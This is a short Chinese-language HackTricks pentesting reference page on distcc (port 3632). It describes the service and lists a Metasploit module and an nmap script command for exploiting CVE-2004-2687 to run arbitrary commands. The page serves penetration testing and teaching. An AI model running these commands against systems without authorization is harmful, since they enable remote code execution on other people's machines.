3632 - Pentesting distcc

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

基本信息

Distcc是一种工具,通过利用网络中其他计算机的空闲处理能力来增强编译过程。当在一台机器上设置distcc时,该机器能够将其编译任务分发给另一台系统。接收系统必须运行distccd守护程序,并且必须安装有兼容的编译器以处理发送的代码。

默认端口: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

漏洞利用

检查是否容易受到 CVE-2004-2687 漏洞的影响,以执行任意代码:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

我认为shodan没有检测到这项服务。

资源

Álex B (@r1p) 创建的帖子

上一页3389 - Pentesting RDP下一页3690 - Pentesting Subversion (svn server)

最后更新于